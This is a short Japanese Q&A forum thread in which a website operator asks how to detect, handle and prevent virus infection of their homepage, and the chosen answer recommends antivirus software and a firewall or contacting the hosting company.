• ベストアンサー

ホームページのウィルス対策

ウィルスはメールを介して被害に遭うのが圧倒的に 多いそうですが、ウィルスに感染しているホームページを見ても 感染すると聞きました。そこで・・・。 (1) 自分もホームページ運営者の一人ですが、 自分のページが万一感染してら、どうすれば対処 できますか? (2) 感染している否か判断するにはどのようにすれば   いいですか? (3) 感染を防ぐにはどうすればいいですか? 上記の点、よろしくお願い申し上げます。

質問者が選んだベストアンサー

• ベストアンサー
  • PC-GATE
回答No.1

(1)(2)(3)共アンチウイルスやファイアウォールが必要に思います。 ホームページをどのような形(自サーバー、借サーバー)で運用されているのかで違いますが、自サーバの場合は導入すれば済む事ですが借サーバーの場合は管理会社にお問い合わせください。

tsuyo_1002
質問者

お礼

回答ありがとうございました。